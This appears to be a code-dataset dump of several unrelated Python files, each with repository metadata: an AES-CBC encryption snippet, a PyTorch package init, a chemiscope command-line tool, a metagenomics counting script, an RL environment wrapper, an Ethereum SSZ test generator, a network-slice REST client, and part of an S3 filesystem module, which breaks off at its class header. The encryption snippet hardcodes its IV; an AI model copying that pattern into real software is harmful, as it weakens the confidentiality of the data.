iv = '1234567812345678'
aes = AES.new(key, AES.MODE_CBC, iv)
encoder = PKCS7Encoder()
text = 'This is my plain text'
# pad the plain text according to PKCS7
pad_text = encoder.encode(text)
# encrypt the padding text
cipher = aes.encrypt(pad_text)
# base64 encode the cipher text for transport
enc_cipher = base64.b64encode(cipher)
print enc_cipher
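# Decryption counterpart (illustrative sketch, not part of the original file):
# reverse the steps above -- base64 decode, AES-CBC decrypt with a fresh cipher
# object (CBC mode keeps state), then strip the PKCS7 padding. decode() is
# assumed here to be the inverse of the pkcs7 module's encode() used above.
dec_aes = AES.new(key, AES.MODE_CBC, iv)
pad_plain = dec_aes.decrypt(base64.b64decode(enc_cipher))
plain_text = encoder.decode(pad_plain)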
| 0 | 0 | 0 |
c55c8fe7e817243e22b1a5e3ece75a4d62cad57e | 1,554 | py | Python | neuralnet_pytorch/__init__.py | justanhduc/neuralnet-pytorch | cbb0c5a540a0ba91cb4dd20684bb00692305d193 | [
"MIT"
] | 28 | 2019-01-07T04:07:55.000Z | 2021-11-09T15:16:11.000Z | neuralnet_pytorch/__init__.py | justanhduc/neuralnet-pytorch | cbb0c5a540a0ba91cb4dd20684bb00692305d193 | [
"MIT"
] | 9 | 2019-12-25T08:00:33.000Z | 2021-11-23T09:02:34.000Z | neuralnet_pytorch/__init__.py | justanhduc/neuralnet-pytorch | cbb0c5a540a0ba91cb4dd20684bb00692305d193 | [
"MIT"
] | 3 | 2020-08-07T12:49:05.000Z | 2022-03-07T21:32:39.000Z | from __future__ import print_function
minimum_required = '1.0.0'
# Ensure Pytorch is importable and its version is sufficiently recent. This
# needs to happen before anything else, since the imports below will try to
# import Pytorch, too.
def _ensure_pt_install(): # pylint: disable=g-statement-before-imports
"""Attempt to import Pytorch, and ensure its version is sufficient.
Raises:
ImportError: if either Pytorch is not importable or its version is
inadequate.
"""
try:
import torch
except ImportError:
# Print more informative error message, then reraise.
print('\n\nFailed to import Pytorch. '
'To use neuralnet-pytorch, please install '
'Pytorch (> %s) by following instructions at '
'https://pytorch.org/get-started/locally/.\n\n' % minimum_required)
raise
del torch
_ensure_pt_install()
# Cleanup symbols to avoid polluting namespace.
del minimum_required
import sys as _sys
for symbol in ['_ensure_pt_install', '_sys']:
delattr(_sys.modules[__name__], symbol)
try:
import neuralnet_pytorch.ext as ext
cuda_ext_available = True
del ext
except ModuleNotFoundError:
cuda_ext_available = False
from . import utils
from .utils import DataLoader, DataPrefetcher, cuda_available, function
from .layers import *
from .metrics import *
from .monitor import *
from . import optim
from .version import author as __author__
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 27.75 | 81 | 0.721364 | from __future__ import print_function
minimum_required = '1.0.0'
# Ensure Pytorch is importable and its version is sufficiently recent. This
# needs to happen before anything else, since the imports below will try to
# import Pytorch, too.
def _ensure_pt_install(): # pylint: disable=g-statement-before-imports
"""Attempt to import Pytorch, and ensure its version is sufficient.
Raises:
ImportError: if either Pytorch is not importable or its version is
inadequate.
"""
try:
import torch
except ImportError:
# Print more informative error message, then reraise.
print('\n\nFailed to import Pytorch. '
'To use neuralnet-pytorch, please install '
'Pytorch (> %s) by following instructions at '
'https://pytorch.org/get-started/locally/.\n\n' % minimum_required)
raise
del torch
_ensure_pt_install()
# Cleanup symbols to avoid polluting namespace.
del minimum_required
import sys as _sys
for symbol in ['_ensure_pt_install', '_sys']:
delattr(_sys.modules[__name__], symbol)
try:
import neuralnet_pytorch.ext as ext
cuda_ext_available = True
del ext
except ModuleNotFoundError:
cuda_ext_available = False
from . import utils
from .utils import DataLoader, DataPrefetcher, cuda_available, function
from .layers import *
from .metrics import *
from .monitor import *
from . import optim
from .version import author as __author__
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| 0 | 0 | 0 |
4a38c0dcd17b7655c6608474cd12a6bc89ea440d | 3,482 | py | Python | python/chemiscope/main.py | Luthaf/chemiscope | 4d40f587c05b7fdd546444134ab15bd80ad237ff | [
"BSD-3-Clause"
] | null | null | null | python/chemiscope/main.py | Luthaf/chemiscope | 4d40f587c05b7fdd546444134ab15bd80ad237ff | [
"BSD-3-Clause"
] | null | null | null | python/chemiscope/main.py | Luthaf/chemiscope | 4d40f587c05b7fdd546444134ab15bd80ad237ff | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .input import write_input
def main():
"""
Command-line utility to generate an input for chemiscope — the interactive
structure-property explorer. Parses an input file containing atomic
structures using the ASE I/O module, and converts it into a JSON file that
can be loaded in chemiscope. Frame and environment properties must be
written in the same file containing atomic structures: we recommend the
extended xyz format, which is flexible and simple. In all cases, this
utility will simply write to the JSON file anything that is readable by
ASE.
"""
import argparse
try:
# command-line execution. requires ASE IO module
import ase.io as ase_io
except ImportError:
raise ImportError(
"chemiscope_input needs ASE modules to parse structure inputs"
)
    # Tweak the autogenerated help output to look nicer
    def formatter(prog):
        return argparse.HelpFormatter(prog, max_help_position=22)
parser = argparse.ArgumentParser(
description=main.__doc__, formatter_class=formatter
)
parser.add_argument(
"input", type=str, help="input file containing the structures and properties"
)
parser.add_argument(
"-o", "--output", type=str, help="chemiscope output file in JSON format"
)
parser.add_argument(
"-c",
"--cutoff",
type=float,
help="generate atom-centred environments with the given cutoff",
)
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--only-atoms",
action="store_true",
help="only use per-atom properties from the input file",
)
group.add_argument(
"--only-structures",
action="store_true",
help="only use per-structure properties from the input file",
)
parser.add_argument("--name", default="", type=str, help="name of the dataset")
parser.add_argument(
"--description", default="", type=str, help="description of the dataset"
)
parser.add_argument(
"--authors", nargs="*", type=str, default=[], help="list of dataset authors"
)
parser.add_argument(
"--references",
nargs="*",
type=str,
default=[],
help="list of references for the dataset",
)
args = parser.parse_args()
if args.only_atoms and args.cutoff is None:
raise Exception("--only-atoms requires to give --cutoff")
if args.only_structures and args.cutoff is not None:
raise Exception("--only-structure can not be given with --cutoff")
# read file with ASE and remove extraneous properties
frames = ase_io.read(args.input, ":")
if args.only_structures:
for frame in frames:
for key in list(frame.arrays.keys()):
if key not in ["positions", "numbers"]:
del frame.arrays[key]
elif args.only_atoms:
for frame in frames:
frame.info = {}
# determine output file name automatically if missing
output = args.output or args.input + "_chemiscope.json.gz"
write_input(
path=output,
frames=frames,
meta={
"name": args.name,
"description": args.description,
"authors": args.authors,
"references": args.references,
},
cutoff=args.cutoff,
)
if __name__ == "__main__":
main()
| 32.240741 | 85 | 0.631534 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from .input import write_input
def main():
"""
Command-line utility to generate an input for chemiscope — the interactive
structure-property explorer. Parses an input file containing atomic
structures using the ASE I/O module, and converts it into a JSON file that
can be loaded in chemiscope. Frame and environment properties must be
written in the same file containing atomic structures: we recommend the
extended xyz format, which is flexible and simple. In all cases, this
utility will simply write to the JSON file anything that is readable by
ASE.
"""
import argparse
try:
# command-line execution. requires ASE IO module
import ase.io as ase_io
except ImportError:
raise ImportError(
"chemiscope_input needs ASE modules to parse structure inputs"
)
# Tweak the autogenerated help output to look nicer
def formatter(prog):
return argparse.HelpFormatter(prog, max_help_position=22)
parser = argparse.ArgumentParser(
description=main.__doc__, formatter_class=formatter
)
parser.add_argument(
"input", type=str, help="input file containing the structures and properties"
)
parser.add_argument(
"-o", "--output", type=str, help="chemiscope output file in JSON format"
)
parser.add_argument(
"-c",
"--cutoff",
type=float,
help="generate atom-centred environments with the given cutoff",
)
group = parser.add_mutually_exclusive_group()
group.add_argument(
"--only-atoms",
action="store_true",
help="only use per-atom properties from the input file",
)
group.add_argument(
"--only-structures",
action="store_true",
help="only use per-structure properties from the input file",
)
parser.add_argument("--name", default="", type=str, help="name of the dataset")
parser.add_argument(
"--description", default="", type=str, help="description of the dataset"
)
parser.add_argument(
"--authors", nargs="*", type=str, default=[], help="list of dataset authors"
)
parser.add_argument(
"--references",
nargs="*",
type=str,
default=[],
help="list of references for the dataset",
)
args = parser.parse_args()
if args.only_atoms and args.cutoff is None:
raise Exception("--only-atoms requires to give --cutoff")
if args.only_structures and args.cutoff is not None:
raise Exception("--only-structure can not be given with --cutoff")
# read file with ASE and remove extraneous properties
frames = ase_io.read(args.input, ":")
if args.only_structures:
for frame in frames:
for key in list(frame.arrays.keys()):
if key not in ["positions", "numbers"]:
del frame.arrays[key]
elif args.only_atoms:
for frame in frames:
frame.info = {}
# determine output file name automatically if missing
output = args.output or args.input + "_chemiscope.json.gz"
write_input(
path=output,
frames=frames,
meta={
"name": args.name,
"description": args.description,
"authors": args.authors,
"references": args.references,
},
cutoff=args.cutoff,
)
if __name__ == "__main__":
main()
| 65 | 0 | 26 |
080538794e45ef5bbfa6060102fca96fc9120d38 | 7,410 | py | Python | FunTaxaCount/src/funtaxacount.py | PNNL-CompBio/kansas-native-prairie | 40e24da4b0b89d7a568b0c4c8d94a3f6da3ea766 | [
"BSD-3-Clause"
] | null | null | null | FunTaxaCount/src/funtaxacount.py | PNNL-CompBio/kansas-native-prairie | 40e24da4b0b89d7a568b0c4c8d94a3f6da3ea766 | [
"BSD-3-Clause"
] | null | null | null | FunTaxaCount/src/funtaxacount.py | PNNL-CompBio/kansas-native-prairie | 40e24da4b0b89d7a568b0c4c8d94a3f6da3ea766 | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import numpy as np
import argparse, sys, re
orf_names = ['ORF_ID', 'Contig', 'COG', 'KO'] #, 'product']
def merge_orf_and_funtax( orf_file, funtax_file ):
"""
Takes an orf file and a funtaxa file and returns the merge
"""
orf_df = pd.read_table(orf_file, header=None, names=orf_names, index_col='ORF_ID', usecols=orf_names, engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df = pd.read_table(funtax_file, index_col='ORF_ID', engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df[['COG','KO']] = orf_df[['COG','KO']]
funtax_df['taxonId'] = funtax_df['taxonomy'].replace(r'.+\(([0-9]+)\)', value=r'\1', regex=True)
genes = funtax_df.reset_index()
genes['gene'] = genes['ORF_ID']
return genes.set_index('gene')
def generate_gff( mapfile, funtax_orf_file ):
"""
Takes the mapfile and annotation file and generates a gff file that maps reads in the bamfile to genes
"""
annotation2assembly_map = pd.read_table(mapfile,
names=['annotation','assembly','length'],
index_col='annotation')
funtax_gff = pd.read_table( funtax_orf_file.name, engine='python', encoding='ISO-8859-1', quoting=3)
funtax_gff['seqid'] = funtax_gff.join(annotation2assembly_map, on='Contig_Name')['assembly']
funtax_gff['source'] = 'Prodigal_v2.00'
funtax_gff['type'] = 'CDS'
funtax_gff['score'] = 100.0
funtax_gff['phase'] = 0
funtax_gff['attributes'] = funtax_gff['ORF_ID'].str.replace(r'(.*)', r'ID=\1;')
return funtax_gff[['seqid','source', 'type','start', 'end', 'score', 'strand','phase','attributes']]
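# Illustrative helper (not part of the original module): the frame returned by
# generate_gff is already in GFF column order, so it can be serialized as a
# plain 9-column, tab-separated file. The name write_gff is hypothetical.
def write_gff(mapfile, funtax_orf_file, out_path):
    gff_df = generate_gff(mapfile, funtax_orf_file)
    gff_df.to_csv(out_path, sep='\t', header=False, index=False)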
| 47.806452 | 156 | 0.652901 | import pandas as pd
import numpy as np
import argparse, sys, re
orf_names = ['ORF_ID', 'Contig', 'COG', 'KO'] #, 'product']
def merge_orf_and_funtax( orf_file, funtax_file ):
"""
Takes an orf file and a funtaxa file and returns the merge
"""
orf_df = pd.read_table(orf_file, header=None, names=orf_names, index_col='ORF_ID', usecols=orf_names, engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df = pd.read_table(funtax_file, index_col='ORF_ID', engine='python', encoding="ISO-8859-1", quoting=3)
funtax_df[['COG','KO']] = orf_df[['COG','KO']]
funtax_df['taxonId'] = funtax_df['taxonomy'].replace(r'.+\(([0-9]+)\)', value=r'\1', regex=True)
genes = funtax_df.reset_index()
genes['gene'] = genes['ORF_ID']
return genes.set_index('gene')
def get_function_counts( function, orf_file, funtax_file, read_count_file ):
genes = merge_orf_and_funtax( orf_file, funtax_file )
read_counts = pd.read_table( read_count_file, index_col='gene', engine='python')
read_counts[function] = genes[function]
function_counts = read_counts.groupby(function).sum()
#if function = 'ec':
# ecs_df = pd.read_table(ec_file, index_col='EC')
# return pd.concat([ec_df, function_counts], axis=1, join_axes=[function_counts.index])
return function_counts
def reindex_contig_gene_id( contig_id ):
return lambda match_obj: 'ID={}_{};'.format( contig_id, int(match_obj.group(2)) - 1 )
def map_seqid(annotation2assembly_file, gff_in, gff_out, map_id_p = False):
cgRE = re.compile(r'ID=([0-9]+)_([0-9]+);')
annotation2assembly_map = pd.read_table(annotation2assembly_file,
names=['annotation','assembly','length'],index_col='annotation')
with gff_out as out:
for line in open(gff_in.name, 'r', encoding='ISO-8859-1'):
m = line.split('\t')
newline = line
if len(m) > 8 and m[0] in annotation2assembly_map.index:
newline = annotation2assembly_map.loc[m[0],'assembly'] + '\t' + '\t'.join(m[1:])
if map_id_p:
newline = cgRE.sub( reindex_contig_gene_id( m[0] ), newline )
out.write(newline)
def generate_gff( mapfile, funtax_orf_file ):
"""
Takes the mapfile and annotation file and generates a gff file that maps reads in the bamfile to genes
"""
annotation2assembly_map = pd.read_table(mapfile,
names=['annotation','assembly','length'],
index_col='annotation')
funtax_gff = pd.read_table( funtax_orf_file.name, engine='python', encoding='ISO-8859-1', quoting=3)
funtax_gff['seqid'] = funtax_gff.join(annotation2assembly_map, on='Contig_Name')['assembly']
funtax_gff['source'] = 'Prodigal_v2.00'
funtax_gff['type'] = 'CDS'
funtax_gff['score'] = 100.0
funtax_gff['phase'] = 0
funtax_gff['attributes'] = funtax_gff['ORF_ID'].str.replace(r'(.*)', r'ID=\1;')
return funtax_gff[['seqid','source', 'type','start', 'end', 'score', 'strand','phase','attributes']]
def get_funtaxa_counts( funtax_file, orf_file, read_count_file, ncbi_tree_file, ncbi_megan_map_file, merged_file, rank, function ):
ncbi_tree = get_ncbi_tree( ncbi_tree_file )
ncbi_megan_map = get_ncbi_megan_map( ncbi_megan_map_file )
genes = merge_orf_and_funtax( orf_file, funtax_file )
read_counts = pd.read_table( read_count_file, index_col='gene', engine='python')
read_counts['taxonId'] = check_merged( genes['taxonId'], merged_file )
read_counts[function] = genes[function]
fun_taxon_counts = read_counts.groupby(['taxonId', function]).sum().reset_index()
fun_taxon_counts[rank] = fun_taxon_counts['taxonId'].apply( lambda x: get_rank( ncbi_tree, x, rank ) )
fun_rank_counts = fun_taxon_counts.drop('taxonId', axis=1).groupby([rank, function]).sum()
fun_rank_counts.insert(0, 'ancestry', pd.Series([get_ancestry(ncbi_tree, r, ncbi_megan_map )
for (r, f) in fun_rank_counts.index],
index=fun_rank_counts.index))
return fun_rank_counts.dropna()
def get_read_counts(read_count_files ):
read_count_array = []
header = []
for read_count_file in read_count_files:
header.append(read_count_file.name)
read_count_array.append(pd.read_table( read_count_file, index_col=0,header=None, names=['gene',header[-1]]))
return pd.concat(read_count_array, axis=1)
def check_merged( taxonId, merged_file ):
merged_dict = get_merged_map( merged_file )
taxonId = pd.to_numeric(taxonId, errors= 'coerce')
return taxonId.apply( lambda x: merged_dict.get(x,x))
def get_rank_counts( funtax_file, orf_file, read_count_file, ncbi_tree_file, ncbi_megan_map_file, merged_file, rank ):
ncbi_tree = get_ncbi_tree( ncbi_tree_file )
ncbi_megan_map = get_ncbi_megan_map( ncbi_megan_map_file )
genes = merge_orf_and_funtax( orf_file, funtax_file )
read_counts = pd.read_table( read_count_file, index_col='gene', engine='python')
read_counts['taxonId'] = check_merged( genes['taxonId'], merged_file )
taxon_counts = read_counts.groupby('taxonId').sum().reset_index()
taxon_counts[rank] = taxon_counts['taxonId'].apply( lambda x: get_rank( ncbi_tree, x, rank ) )
rank_counts = taxon_counts.drop('taxonId', axis=1).groupby( rank ).sum().reset_index()
#Insert ancestry into this column
rank_counts.insert(0, 'ancestry', rank_counts[rank].apply( lambda x: get_ancestry(ncbi_tree, x, ncbi_megan_map ) ) )
return rank_counts.set_index(rank).dropna()
def get_merged_map( merged_file ):
return pd.read_table( merged_file ,
header=None, sep=r'\t\|',
names=['tax_id','merged_tax_id'],
engine='python',
index_col=0,usecols=[0,1]).to_dict()['merged_tax_id']
def get_ncbi_megan_map( meganfile ):
ncbi_megan_map = {}
for line in meganfile:
fields = line.split("\t")
taxonId, taxonName = int(fields[0].strip()), fields[1].strip()
ncbi_megan_map[taxonId] = taxonName
return ncbi_megan_map
def get_ncbi_tree( ncbi_tree_file ):
return pd.read_table( ncbi_tree_file,
header=None, sep=r'\t\|\t',
names=['tax_id','parent tax_id','rank'],
engine='python',
index_col=0,usecols=[0,1,2])
def get_rank( ncbi_tree, tax_id, rank):
old_id = -1
try:
current_id = int(tax_id)
except ValueError:
return tax_id
while current_id in ncbi_tree.index and current_id != old_id:
if ncbi_tree.loc[current_id, 'rank'] == rank:
return current_id
else:
old_id = current_id
current_id = ncbi_tree.loc[current_id, 'parent tax_id']
return current_id
def get_ancestry( ncbi_tree, taxon_id, ncbi_megan_map ):
ancestry = []
old_id = -1
try:
current_id = int(taxon_id)
except ValueError:
return np.nan
while current_id in ncbi_tree.index and current_id != old_id:
old_id = current_id
current_id = ncbi_tree.loc[current_id, 'parent tax_id']
ancestry.insert(0, old_id )
return ';'.join([ ncbi_megan_map[i] for i in ancestry if i in ncbi_megan_map])
| 5,420 | 0 | 275 |
6220278fb5beb386dbd23cda33aaad7304f286d1 | 511 | py | Python | pettingzoo/mappo_ssd/stag_hunt_gw_v1.py | footoredo/PettingZoo | b48baf9ca459d72cdcb7013ef86c5fc470856081 | [
"MIT"
] | null | null | null | pettingzoo/mappo_ssd/stag_hunt_gw_v1.py | footoredo/PettingZoo | b48baf9ca459d72cdcb7013ef86c5fc470856081 | [
"MIT"
] | null | null | null | pettingzoo/mappo_ssd/stag_hunt_gw_v1.py | footoredo/PettingZoo | b48baf9ca459d72cdcb7013ef86c5fc470856081 | [
"MIT"
] | null | null | null | from .utils.env import make_env, GridWorldParallelEnv
| 51.1 | 119 | 0.661448 | from .utils.env import make_env, GridWorldParallelEnv
class parallel_env(GridWorldParallelEnv):
def __init__(self, max_frames, share_reward, shape_reward, shape_beta, choose=0, length=5, **kwargs):
super(parallel_env, self).__init__(env_name='StagHuntGW', num_agents=2, max_frames=max_frames,
share_reward=share_reward, shape_reward=shape_reward, shape_beta=shape_beta,
choose=choose, length=length, **kwargs)
| 386 | 20 | 49 |
e6cd3d976574d61338e1d130ac3d717197a58ae5 | 1,873 | py | Python | tests/generators/ssz_generic/main.py | BenSchZA/eth2.0-specs | 1235e58a8db09efd058f31087d53d91b97b83011 | [
"CC0-1.0"
] | 1 | 2021-05-11T09:42:58.000Z | 2021-05-11T09:42:58.000Z | tests/generators/ssz_generic/main.py | amaraka/eth2.0-specs | 1564f6217f50da6c74a815340de24ac62a26851b | [
"CC0-1.0"
] | null | null | null | tests/generators/ssz_generic/main.py | amaraka/eth2.0-specs | 1564f6217f50da6c74a815340de24ac62a26851b | [
"CC0-1.0"
] | null | null | null | from typing import Iterable
from eth2spec.gen_helpers.gen_base import gen_runner, gen_typing
import ssz_basic_vector
import ssz_bitlist
import ssz_bitvector
import ssz_boolean
import ssz_uints
import ssz_container
from eth2spec.test.helpers.constants import PHASE0
if __name__ == "__main__":
gen_runner.run_generator("ssz_generic", [
create_provider("basic_vector", "valid", ssz_basic_vector.valid_cases),
create_provider("basic_vector", "invalid", ssz_basic_vector.invalid_cases),
create_provider("bitlist", "valid", ssz_bitlist.valid_cases),
create_provider("bitlist", "invalid", ssz_bitlist.invalid_cases),
create_provider("bitvector", "valid", ssz_bitvector.valid_cases),
create_provider("bitvector", "invalid", ssz_bitvector.invalid_cases),
create_provider("boolean", "valid", ssz_boolean.valid_cases),
create_provider("boolean", "invalid", ssz_boolean.invalid_cases),
create_provider("uints", "valid", ssz_uints.valid_cases),
create_provider("uints", "invalid", ssz_uints.invalid_cases),
create_provider("containers", "valid", ssz_container.valid_cases),
create_provider("containers", "invalid", ssz_container.invalid_cases),
])
| 40.717391 | 95 | 0.70315 | from typing import Iterable
from eth2spec.gen_helpers.gen_base import gen_runner, gen_typing
import ssz_basic_vector
import ssz_bitlist
import ssz_bitvector
import ssz_boolean
import ssz_uints
import ssz_container
from eth2spec.test.helpers.constants import PHASE0
def create_provider(handler_name: str, suite_name: str, case_maker) -> gen_typing.TestProvider:
def prepare_fn(configs_path: str) -> str:
return "general"
def cases_fn() -> Iterable[gen_typing.TestCase]:
for (case_name, case_fn) in case_maker():
yield gen_typing.TestCase(
fork_name=PHASE0,
runner_name='ssz_generic',
handler_name=handler_name,
suite_name=suite_name,
case_name=case_name,
case_fn=case_fn
)
return gen_typing.TestProvider(prepare=prepare_fn, make_cases=cases_fn)
if __name__ == "__main__":
gen_runner.run_generator("ssz_generic", [
create_provider("basic_vector", "valid", ssz_basic_vector.valid_cases),
create_provider("basic_vector", "invalid", ssz_basic_vector.invalid_cases),
create_provider("bitlist", "valid", ssz_bitlist.valid_cases),
create_provider("bitlist", "invalid", ssz_bitlist.invalid_cases),
create_provider("bitvector", "valid", ssz_bitvector.valid_cases),
create_provider("bitvector", "invalid", ssz_bitvector.invalid_cases),
create_provider("boolean", "valid", ssz_boolean.valid_cases),
create_provider("boolean", "invalid", ssz_boolean.invalid_cases),
create_provider("uints", "valid", ssz_uints.valid_cases),
create_provider("uints", "invalid", ssz_uints.invalid_cases),
create_provider("containers", "valid", ssz_container.valid_cases),
create_provider("containers", "invalid", ssz_container.invalid_cases),
])
| 608 | 0 | 23 |
1be4a2d461562127f4eacd1e1f8cade75021cbaf | 3,718 | py | Python | slice_subnet_mapper/slice_subnet_mapper.py | INSPIRE-5Gplus/i5p-netslice-mgr | c5cefabfa6ce20a6c94519eb5b1778583f82ac73 | [
"Apache-2.0"
] | null | null | null | slice_subnet_mapper/slice_subnet_mapper.py | INSPIRE-5Gplus/i5p-netslice-mgr | c5cefabfa6ce20a6c94519eb5b1778583f82ac73 | [
"Apache-2.0"
] | 2 | 2021-08-25T13:54:03.000Z | 2021-08-25T14:20:06.000Z | slice_subnet_mapper/slice_subnet_mapper.py | INSPIRE-5Gplus/i5p-netslice-mgr | c5cefabfa6ce20a6c94519eb5b1778583f82ac73 | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python3.4
import os, sys, logging, json, argparse, time, datetime, requests, uuid
from config_files import settings
#### NETWORK SLICE MANAGER/NFVO URL
JSON_CONTENT_HEADER = {'Content-Type':'application/json'}
#### REQUESTS
# returns all the slice-subnets templates in the NSM
# returns a specific slice-subnet template in the NSM
# returns all slice-subnet instances in the NSM
# returns specific slice-subnet instance in the NSM
# sends request to deploy a slice-subnet template (NST) to the NSM
# returns specific slice-subnet instance request from the NSM/NFVO
# sends request to terminate a slice-subnet template (NST) to the NSM
| 43.741176 | 124 | 0.733728 | #!/usr/local/bin/python3.4
import os, sys, logging, json, argparse, time, datetime, requests, uuid
from config_files import settings
#### NETWORK SLICE MANAGER/NFVO URL
JSON_CONTENT_HEADER = {'Content-Type':'application/json'}
def get_nsm_url():
nsm_ip = os.environ.get("NSM_IP")
nsm_port = os.environ.get("NSM_PORT")
nfvo_url = "http://"+ str(nsm_ip) +":"+ str(nsm_port) +"/api/v3"
return nfvo_url
#### REQUESTS
# returns all the slice-subnets templates in the NSM
def get_all_slice_subnet_templates():
settings.logger.info('SUBNET_MAPPER: Requests all local slice-subnet templates information.')
url = get_nsm_url() + "/slices"
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# returns a specific slice-subnet template in the NSM
def get_slice_subnet_template(slice_ID):
settings.logger.info('SUBNET_MAPPER: Requests local slice-subnet template information. ID: ' + str(slice_ID))
url = get_nsm_url() + "/slices/" + str(slice_ID)
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# returns all slice-subnet instances in the NSM
def get_all_slice_subnet_instances():
settings.logger.info('SUBNET_MAPPER: Requests all local slice-subnet instances information.')
url = get_nsm_url() + "/slice-instances"
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# returns specific slice-subnet instance in the NSM
def get_slice_subnet_instance(instance_ID):
settings.logger.info('SUBNET_MAPPER: Requests local slice-subnet instance information. ID: ' + str(instance_ID))
url = get_nsm_url() + "/slice-instances/" + str(instance_ID)
response = requests.get(url, headers=JSON_CONTENT_HEADER)
return response.text, response.status_code
# sends request to deploy a slice-subnet template (NST) to the NSM
def instantiate_slice_subnet(data_json):
#settings.logger.info('SUBNET_MAPPER: Starts local deployment (TIME 2): ' + str(time.time_ns()))
settings.logger.info("SUBNET_MAPPER: Requests local slice-subnet deployment.")
data_dumps = json.dumps(data_json)
url = get_nsm_url() + "/requests"
response = requests.post(url, headers=JSON_CONTENT_HEADER, data=data_dumps)
jsonresponse = json.loads(response.text)
#id_sample = str(uuid.uuid4())
response = {}
response['id'] = jsonresponse['id']
return response, 200
# returns specific slice-subnet instance request from the NSM/NFVO
def get_slice_subnet_instance_request(request_ID):
time.sleep(5)
url = get_nsm_url() + "/requests/" + str(request_ID)
response = requests.get(url, headers=JSON_CONTENT_HEADER)
jsonresponse = json.loads(response.text)
return jsonresponse, response.status_code
#settings.logger.info('SUBNET_MAPPER: Requests local slice-subnet instance REQUEST information. ID: ' + str(request_ID))
#sample_json = {}
#sample_json['instance_uuid'] = str(uuid.uuid4())
#sample_json['status'] = "INSTANTIATED"
#time.sleep(10)
#settings.logger.info('SUBNET_MAPPER: THE ANSWER!!!! ' + str(sample_json))
#return sample_json, 200
# sends request to terminate a slice-subnet template (NST) to the NSM
def terminate_slice_subnet(data_json):
settings.logger.info("SUBNET_MAPPER: Requests local slice-subnet termination.")
data_dumps = json.dumps(data_json)
#url = get_nsm_url() + "/requests"
#response = requests.post(url, headers=JSON_CONTENT_HEADER, data=data_dumps)
#return response.text, response.status_code
id_sample = str(uuid.uuid4())
response = {}
response['id'] = id_sample
return response, 200
| 2,879 | 0 | 176 |
7c3036b10fff4b82c4b096c60d9c6b2baf89c51d | 6,483 | py | Python | rastervision/filesystem/s3_filesystem.py | ValRat/raster-vision | 90f4c5d99869466c65fa972fa8f08f68c1102820 | [
"Apache-2.0"
] | 4 | 2019-03-11T12:38:15.000Z | 2021-04-06T14:57:52.000Z | rastervision/filesystem/s3_filesystem.py | ValRat/raster-vision | 90f4c5d99869466c65fa972fa8f08f68c1102820 | [
"Apache-2.0"
] | null | null | null | rastervision/filesystem/s3_filesystem.py | ValRat/raster-vision | 90f4c5d99869466c65fa972fa8f08f68c1102820 | [
"Apache-2.0"
] | 1 | 2021-02-25T18:23:27.000Z | 2021-02-25T18:23:27.000Z | import io
import os
import subprocess
from datetime import datetime
from urllib.parse import urlparse
from rastervision.filesystem import (FileSystem, NotReadableError,
NotWritableError)
# Code from https://alexwlchan.net/2017/07/listing-s3-keys/
def get_matching_s3_objects(bucket, prefix='', suffix=''):
"""
Generate objects in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch objects whose key starts with
this prefix (optional).
:param suffix: Only fetch objects whose keys end with
this suffix (optional).
"""
import boto3
s3 = boto3.client('s3')
kwargs = {'Bucket': bucket}
# If the prefix is a single string (not a tuple of strings), we can
# do the filtering directly in the S3 API.
if isinstance(prefix, str):
kwargs['Prefix'] = prefix
while True:
# The S3 API response is a large blob of metadata.
# 'Contents' contains information about the listed objects.
resp = s3.list_objects_v2(**kwargs)
try:
contents = resp['Contents']
except KeyError:
return
for obj in contents:
key = obj['Key']
if key.startswith(prefix) and key.endswith(suffix):
yield obj
# The S3 API is paginated, returning up to 1000 keys at a time.
# Pass the continuation token into the next response, until we
# reach the final page (when this field is missing).
try:
kwargs['ContinuationToken'] = resp['NextContinuationToken']
except KeyError:
break
def get_matching_s3_keys(bucket, prefix='', suffix=''):
"""
Generate the keys in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch keys that start with this prefix (optional).
:param suffix: Only fetch keys that end with this suffix (optional).
"""
for obj in get_matching_s3_objects(bucket, prefix, suffix):
yield obj['Key']
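# Usage sketch (illustrative only; the bucket name and prefix are placeholders):
# collect every .tif key under a prefix without handling S3 pagination by hand.
def list_tif_keys(bucket_name, prefix=''):
    return list(get_matching_s3_keys(bucket_name, prefix=prefix, suffix='.tif'))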
| 32.742424 | 79 | 0.600956 | import io
import os
import subprocess
from datetime import datetime
from urllib.parse import urlparse
from rastervision.filesystem import (FileSystem, NotReadableError,
NotWritableError)
# Code from https://alexwlchan.net/2017/07/listing-s3-keys/
def get_matching_s3_objects(bucket, prefix='', suffix=''):
"""
Generate objects in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch objects whose key starts with
this prefix (optional).
:param suffix: Only fetch objects whose keys end with
this suffix (optional).
"""
import boto3
s3 = boto3.client('s3')
kwargs = {'Bucket': bucket}
# If the prefix is a single string (not a tuple of strings), we can
# do the filtering directly in the S3 API.
if isinstance(prefix, str):
kwargs['Prefix'] = prefix
while True:
# The S3 API response is a large blob of metadata.
# 'Contents' contains information about the listed objects.
resp = s3.list_objects_v2(**kwargs)
try:
contents = resp['Contents']
except KeyError:
return
for obj in contents:
key = obj['Key']
if key.startswith(prefix) and key.endswith(suffix):
yield obj
# The S3 API is paginated, returning up to 1000 keys at a time.
# Pass the continuation token into the next response, until we
# reach the final page (when this field is missing).
try:
kwargs['ContinuationToken'] = resp['NextContinuationToken']
except KeyError:
break
def get_matching_s3_keys(bucket, prefix='', suffix=''):
"""
Generate the keys in an S3 bucket.
:param bucket: Name of the S3 bucket.
:param prefix: Only fetch keys that start with this prefix (optional).
:param suffix: Only fetch keys that end with this suffix (optional).
"""
for obj in get_matching_s3_objects(bucket, prefix, suffix):
yield obj['Key']
class S3FileSystem(FileSystem):
